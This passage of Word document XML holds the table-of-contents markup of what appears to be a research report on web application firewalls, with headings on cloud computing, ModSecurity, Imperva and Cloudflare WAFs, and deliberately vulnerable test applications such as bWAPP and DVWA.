                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A3E1C0A" w14:textId="0737FD85" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138467" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.1 Research Motivation</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_Toc71138467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9</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BC6906A" w14:textId="14032464" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138468" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.2 Web Applications</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_Toc71138468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10</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B9EF1C0" w14:textId="775603F1" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138469" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.3 Cyber-attacks on Web Applications</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_Toc71138469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11</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BAD11EB" w14:textId="32E12663" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138470" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.4 Web Application Firewall (WAF)</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_Toc71138470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14</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09951C92" w14:textId="128561FD" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138471" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.5 Research Question</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_Toc71138471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14</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3875C95B" w14:textId="65A6A829" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138472" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.6 Research Challenges</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_Toc71138472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14</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19BA8A5E" w14:textId="7562E36E" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138473" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1.7 Research Summary</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_Toc71138473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14</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="245AF79D" w14:textId="5DD6EABA" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138474" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2. Background</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_Toc71138474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15</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50DA161B" w14:textId="7738CAA3" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138475" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2.1 Cloud Computing</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_Toc71138475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15</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="598EDC01" w14:textId="40A27B66" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138476" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1 Cloud Service Models</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_Toc71138476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15</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="589AF62B" w14:textId="1BF762CE" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138477" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2 Cloud Service Providers</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_Toc71138477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16</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BE2A75D" w14:textId="28FAE18E" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138478" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.3 Amazon Web Services (AWS)</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_Toc71138478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17</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="513B6929" w14:textId="47D7B76E" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138479" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2.2 Open Systems Interconnection (OSI) Layers and Security</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_Toc71138479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18</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F3E2395" w14:textId="02F699A2" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138480" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2.3 Web Application Firewall (WAF)</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_Toc71138480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20</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DE7F53A" w14:textId="7BADB86A" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138481" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1 ModSecurity</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_Toc71138481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20</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06B793B5" w14:textId="61A952DC" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138482" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2 Imperva Cloud WAF</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_Toc71138482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21</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BAA2DDE" w14:textId="29B446F2" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138483" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.3 Cloudflare Cloud WAF</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_Toc71138483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22</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AAE7071" w14:textId="56741DB0" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138484" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.4 Content Delivery Network (CDN)</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_Toc71138484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23</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="711C943C" w14:textId="0CB58CF4" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138485" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2.4 Vulnerable Web Applications</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_Toc71138485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24</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="706FC54B" w14:textId="448B3E56" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138486" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.1 Buggy Web Application (bWAPP)</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_Toc71138486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24</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AF0C60F" w14:textId="24A878C7" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138487" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.2 Damn Vulnerable Web Application (DVWA)</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_Toc71138487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24</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51EAF202" w14:textId="7E2F9295" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138488" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3. Method</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_Toc71138488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25</w:t>
            </w:r>
